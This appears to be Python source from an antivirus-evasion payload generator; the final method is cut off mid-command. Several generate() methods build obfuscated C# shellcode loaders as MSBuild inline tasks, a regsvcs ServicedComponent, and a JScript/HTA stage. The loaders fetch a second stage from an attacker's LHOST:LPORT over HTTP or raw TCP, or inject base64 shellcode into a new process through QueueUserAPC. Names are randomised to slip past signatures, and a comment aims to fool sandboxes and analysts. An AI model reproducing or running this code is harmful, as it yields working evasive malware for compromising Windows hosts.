def generate(self): # MSBuild specific variables targetName = bypass_helpers.randomString() className = bypass_helpers.randomString() # get 12 random variables for the API imports r = [bypass_helpers.randomString() for x in range(12)] y = [bypass_helpers.randomString() for x in range(17)] # The header for MSBuild XML files # TODO: Fix the awful formatting msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t<Target Name="{0}"> <{1} /> </Target> <UsingTask TaskName="{1}" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > <Task> <Code Type="Class" Language="cs"> <![CDATA[ """.format(targetName, className) # imports and namespace setup payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n" payload_code += "public class %s : Task, ITask {\n" % (className) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) # code for the randomString() function randomStringName = bypass_helpers.randomString() bufferName = bypass_helpers.randomString() charsName = bypass_helpers.randomString() t = list( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789") random.shuffle(t) chars = ''.join(t) # code for the randomString() method payload_code += "static string %s(Random r, int s) {\n" % ( randomStringName) payload_code += "char[] %s = new char[s];\n" % (bufferName) payload_code += "string %s = \"%s\";\n" % (charsName, chars) payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % ( bufferName, charsName, charsName) payload_code += "return new string(%s);}\n" % (bufferName) # code for the checksum8() function checksum8Name = bypass_helpers.randomString() payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % ( checksum8Name) # code fo the genHTTPChecksum() function genHTTPChecksumName = bypass_helpers.randomString() baseStringName = bypass_helpers.randomString() randCharsName = bypass_helpers.randomString() urlName = bypass_helpers.randomString() random.shuffle(t) randChars = ''.join(t) payload_code += "static string %s(Random r) { string %s = \"\";\n" % ( genHTTPChecksumName, baseStringName) payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % ( baseStringName, randomStringName) payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % ( randCharsName, randChars) payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % ( randCharsName) payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharsName) payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % ( checksum8Name, urlName, urlName) # code for getData() function getDataName = helpers.randomString() strName = helpers.randomString() webClientName = helpers.randomString() sName = helpers.randomString() payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName) payload_code += "WebClient %s = new System.Net.WebClient();\n" % ( webClientName) payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % ( webClientName) payload_code += "byte[] %s = null;\n" % (sName) payload_code += "try { %s = %s.DownloadData(%s);\n" % ( sName, webClientName, strName) payload_code += "if (%s.Length < 100000) return null;}\n" % (sName) payload_code += "catch (WebException) {}\n" payload_code += "return %s;}\n" % (sName) # code fo the inject() function to inject shellcode injectName = bypass_helpers.randomString() sName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) # code for Main() to launch everything sName = bypass_helpers.randomString() randomName = bypass_helpers.randomString() num_tabs_required = 0 payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % ( randomName) payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % ( sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName) payload_code += "%s(%s);\n" % (injectName, sName) while (num_tabs_required != 0): if num_tabs_required == 2: # return true for the msbuild Execute() function payload_code += "\nreturn true;" payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 else: payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 payload_code += "\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>" payload_code = msbuild_header + payload_code self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Base64 encode the shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # randomize all our variable names, yo' className = bypass_helpers.randomString() classNameTwo = bypass_helpers.randomString() namespace = bypass_helpers.randomString() key = bypass_helpers.randomString() execName = bypass_helpers.randomString() bytearrayName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() savedStateName = bypass_helpers.randomString() messWithAnalystName = bypass_helpers.randomString() shellcodeName = bypass_helpers.randomString() rand_bool = bypass_helpers.randomString() random_out = bypass_helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() num_tabs_required = 0 # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;\n" payload_code += "namespace {0}\n {{".format(namespace) payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format(className) # placeholder for legitimate C# program # lets add a message box to throw offf sandbox heuristics and analysts :) payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format(className) payload_code += "\n\t\t[ComRegisterFunction]" payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format(key) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format(classNameTwo, execName) payload_code += "\n[ComUnregisterFunction]" payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format(key) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(classNameTwo, execName) payload_code += "\n\tpublic class {0}\n\t{{".format(classNameTwo) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern IntPtr VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] public static extern bool VirtualProtect(IntPtr %s, uint %s, uint %s, out uint %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, IntPtr %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11], r[12], r[13], r[14], r[15]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);"""%(y[0],y[1],y[2],y[3],y[4],y[5],y[6],y[7],y[8],y[9],y[10],y[11],y[12],y[13],y[14],y[15],y[16]) payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 3 payload_code += '\t' * num_tabs_required + "string %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(\"%s\"));\n" % (bytearrayName, Shellcode) payload_code += '\t' * num_tabs_required + "string[] chars = %s.Split(',').ToArray();\n" %(bytearrayName) payload_code += '\t' * num_tabs_required + "byte[] %s = new byte[chars.Length];\n" %(shellcodeName) payload_code += '\t' * num_tabs_required + "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" %(shellcodeName) # payload_code += '\t' * num_tabs_required + "byte[] {0} = System.Convert.FromBase64String(\"{1}\");".format(shellcodeName, Shellcode) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "IntPtr %s = VirtualAlloc(0, (UInt32)%s.Length, 0x3000, 0x04);\n" % (funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (shellcodeName, funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" %(hThreadName, threadIdName, pinfoName) payload_code += '\t' * num_tabs_required + "uint %s;\n" %(random_out) payload_code += '\t' * num_tabs_required + "bool %s = VirtualProtect(%s, (uint)0x1000, (uint)0x20, out %s);\n" %(rand_bool, funcAddrName, random_out) payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);\n" % (hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heap = bypass_helpers.randomString() rand_ptr = bypass_helpers.randomString() rand_var = bypass_helpers.randomString() payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(rand_heap, shellcodeName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(rand_ptr, rand_heap, shellcodeName) payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(rand_ptr, shellcodeName, shellcodeName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format(rand_var) payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, rand_ptr, rand_var) payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);\n'.format(hThreadName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 self.payload_source_code = payload_code return
def generate(self): getDataName = helpers.randomString() injectName = helpers.randomString() targetName = bypass_helpers.randomString() className = bypass_helpers.randomString() # get 12 random variables for the API imports r = [helpers.randomString() for x in range(12)] y = [helpers.randomString() for x in range(17)] # The header for MSBuild XML files # TODO: Fix the awful formatting msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t<Target Name="{0}"> <{1} /> </Target> <UsingTask TaskName="{1}" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > <Task> <Code Type="Class" Language="cs"> <![CDATA[ """.format(targetName, className) payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n" payload_code += "public class %s : Task, ITask {\n" % (className) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) hostName = helpers.randomString() portName = helpers.randomString() ipName = helpers.randomString() sockName = helpers.randomString() length_rawName = helpers.randomString() lengthName = helpers.randomString() sName = helpers.randomString() total_bytesName = helpers.randomString() handleName = helpers.randomString() payload_code += "static byte[] %s(string %s, int %s) {\n" % ( getDataName, hostName, portName) payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % ( ipName, hostName, portName) payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % ( sockName) payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName) payload_code += " catch { return null;}\n" payload_code += " byte[] %s = new byte[4];\n" % (length_rawName) payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName, length_rawName) payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % ( lengthName, length_rawName) payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName, lengthName) payload_code += " int %s = 0;\n" % (total_bytesName) payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName) payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % ( total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName) payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % ( handleName, sockName) payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % ( handleName, sName, sName) payload_code += " return %s;}\n" % (sName) sName = helpers.randomString() funcAddrName = helpers.randomString() hThreadName = helpers.randomString() threadIdName = helpers.randomString() pinfoName = helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) sName = helpers.randomString() num_tabs_required = 0 payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % ( sName, sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += " %s(%s);\n" % (injectName, sName) while (num_tabs_required != 0): if num_tabs_required == 2: # return true for the msbuild Execute() function payload_code += "\nreturn true;" payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 else: payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 payload_code += "\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>" payload_code = msbuild_header + payload_code self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # randomize all our variables, yo x86 = bypass_helpers.randomString() # generate a random key key = bypass_helpers.randomString().lower() # figure out a sane way to generate two separate instances of shellcode within the framework # currently, only 32 bit payload shellcode will work payload_code, num_tabs_required = gamemaker.senecas_games(self) code = "" num_tabs = 0 bytearrayName = bypass_helpers.randomString() className = "HelloWorld" processMigrate = "Print" processMigratex86 = bypass_helpers.randomString() processMigrateProcessPath = bypass_helpers.randomString() processMigrateShellcode = bypass_helpers.randomString() shellCode = bypass_helpers.randomString() startupInfo = bypass_helpers.randomString() processInformation = bypass_helpers.randomString() success = bypass_helpers.randomString() resultPtr = bypass_helpers.randomString() bytesWritten = bypass_helpers.randomString() resultBool = bypass_helpers.randomString() oldProtect = bypass_helpers.randomString() targetProc = bypass_helpers.randomString() currentThreads = bypass_helpers.randomString() sht = bypass_helpers.randomString() ptr = bypass_helpers.randomString() ThreadHandle = bypass_helpers.randomString() code += "using System;\nusing System.Diagnostics;\nusing System.Reflection;\nusing System.Runtime.InteropServices;\nusing System.Linq;\n\n" code += "[ComVisible(true)]\n" code += "public class {0}\n".format(className) code += "{\n" num_tabs += 1 code += "\t" * num_tabs + "public {0}()\n".format(className) code += "\t" * num_tabs + "{\n\n" code += "\t" * num_tabs + "}\n\n" code += "\t" * num_tabs + "public void {0}(string {1})\n".format( processMigrate, processMigratex86) code += "\t" * num_tabs + "{\n" code += "\t" * num_tabs + payload_code code += "\t" * num_tabs + "string {0};\n".format( processMigrateShellcode) code += "\t" * num_tabs + "string {0};\n".format( processMigrateProcessPath) code += "\t" * num_tabs + "\t{0} = {1};\n".format( processMigrateShellcode, processMigratex86) code += "\t" * num_tabs + "\t{0} = \"{1}\";\n\n".format( processMigrateProcessPath, "C:\\\\Windows\\\\System32\\\\" + self.required_options["PROCESS"][0]) code += '\t' * num_tabs + "\tstring %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(%s));\n" % ( bytearrayName, processMigrateShellcode) code += '\t' * num_tabs + "\tstring[] chars = %s.Split(',').ToArray();\n" % ( bytearrayName) code += '\t' * num_tabs + "\tbyte[] %s = new byte[chars.Length];\n" % ( shellCode) code += '\t' * num_tabs + \ "\tfor (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % ( shellCode) code += "\t" * num_tabs + "\tSTARTUPINFO {0} = new STARTUPINFO();\n".format( startupInfo) code += "\t" * num_tabs + "\tPROCESS_INFORMATION {0} = new PROCESS_INFORMATION();\n".format( processInformation) code += "\t" * num_tabs + "\tbool {0} = CreateProcess({1}, null, IntPtr.Zero, IntPtr.Zero, false, ProcessCreationFlags.CREATE_SUSPENDED | ProcessCreationFlags.CREATE_NO_WINDOW , IntPtr.Zero, null, ref {2}, out {3});\n".format( success, processMigrateProcessPath, startupInfo, processInformation) code += "\t" * num_tabs + "\tIntPtr {0} = VirtualAllocEx({1}.hProcess, IntPtr.Zero, {2}.Length, MEM_COMMIT, PAGE_READWRITE);\n".format( resultPtr, processInformation, shellCode) code += "\t" * num_tabs + "\tIntPtr {0} = IntPtr.Zero;\n".format( bytesWritten) code += "\t" * num_tabs + "\tbool {0} = WriteProcessMemory({1}.hProcess,{2},{3},{4}.Length, out {5});\n".format( resultBool, processInformation, resultPtr, shellCode, shellCode, bytesWritten) code += "\t" * num_tabs + "\tuint {0} = 0;\n".format(oldProtect) code += "\t" * num_tabs + "\t{0} = VirtualProtectEx({1}.hProcess, {2}, {3}.Length, PAGE_EXECUTE_READ, out {4} );\n".format( resultBool, processInformation, resultPtr, shellCode, oldProtect) code += "\t" * num_tabs + "\tProcess {0} = Process.GetProcessById((int){1}.dwProcessId);\n".format( targetProc, processInformation) code += "\t" * num_tabs + "\tProcessThreadCollection {0} = {1}.Threads;\n".format( currentThreads, targetProc) code += "\t" * num_tabs + "\tIntPtr {0} = OpenThread(ThreadAccess.SET_CONTEXT, false, {1}[0].Id);\n".format( sht, currentThreads) code += "\t" * num_tabs + "\tIntPtr {0} = QueueUserAPC({1},{2},IntPtr.Zero);\n".format( ptr, resultPtr, sht) code += "\t" * num_tabs + "\tIntPtr {0} = {1}.hThread;\n".format( ThreadHandle, processInformation) code += "\t" * num_tabs + "\tResumeThread({0});\n".format(ThreadHandle) code += "\t" * num_tabs + "}\n" code += """ private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READ = 0x20; private static UInt32 PAGE_READWRITE = 0x04; [Flags] public enum ProcessAccessFlags : uint { All = 0x001F0FFF, Terminate = 0x00000001, CreateThread = 0x00000002, VirtualMemoryOperation = 0x00000008, VirtualMemoryRead = 0x00000010, VirtualMemoryWrite = 0x00000020, DuplicateHandle = 0x00000040, CreateProcess = 0x000000080, SetQuota = 0x00000100, SetInformation = 0x00000200, QueryInformation = 0x00000400, QueryLimitedInformation = 0x00001000, Synchronize = 0x00100000 } [Flags] public enum ProcessCreationFlags : uint { ZERO_FLAG = 0x00000000, CREATE_BREAKAWAY_FROM_JOB = 0x01000000, CREATE_DEFAULT_ERROR_MODE = 0x04000000, CREATE_NEW_CONSOLE = 0x00000010, CREATE_NEW_PROCESS_GROUP = 0x00000200, CREATE_NO_WINDOW = 0x08000000, CREATE_PROTECTED_PROCESS = 0x00040000, CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, CREATE_SEPARATE_WOW_VDM = 0x00001000, CREATE_SHARED_WOW_VDM = 0x00001000, CREATE_SUSPENDED = 0x00000004, CREATE_UNICODE_ENVIRONMENT = 0x00000400, DEBUG_ONLY_THIS_PROCESS = 0x00000002, DEBUG_PROCESS = 0x00000001, DETACHED_PROCESS = 0x00000008, EXTENDED_STARTUPINFO_PRESENT = 0x00080000, INHERIT_PARENT_AFFINITY = 0x00010000 } public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public uint dwProcessId; public uint dwThreadId; } public struct STARTUPINFO { public uint cb; public string lpReserved; public string lpDesktop; public string lpTitle; public uint dwX; public uint dwY; public uint dwXSize; public uint dwYSize; public uint dwXCountChars; public uint dwYCountChars; public uint dwFillAttribute; public uint dwFlags; public short wShowWindow; public short cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; } [Flags] public enum ThreadAccess : int { TERMINATE = (0x0001) , SUSPEND_RESUME = (0x0002) , GET_CONTEXT = (0x0008) , SET_CONTEXT = (0x0010) , SET_INFORMATION = (0x0020) , QUERY_INFORMATION = (0x0040) , SET_THREAD_TOKEN = (0x0080) , IMPERSONATE = (0x0100) , DIRECT_IMPERSONATION = (0x0200) } [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, int dwThreadId); [DllImport("kernel32.dll",SetLastError = true)] public static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); [DllImport("kernel32.dll", SetLastError = true )] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32.dll")] static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect); [DllImport("kernel32.dll")] public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); [DllImport("kernel32.dll")] public static extern uint ResumeThread(IntPtr hThread); [DllImport("kernel32.dll")] public static extern uint SuspendThread(IntPtr hThread); } """ with open("/tmp/hta_source.cs", "w") as f: f.write(code) if self.required_options["SCRIPT_TYPE"][0].lower() == "jscript": with open("/tmp/migrate.js", "w") as ff: ff.write("o.Print({0});".format(x86)) os.system( "mcs -platform:x86 -target:library -sdk:2 {0} -out:/tmp/dotnettojscript.dll" .format("/tmp/hta_source.cs")) os.system( "WINEPREFIX=/root/.greatsct wine 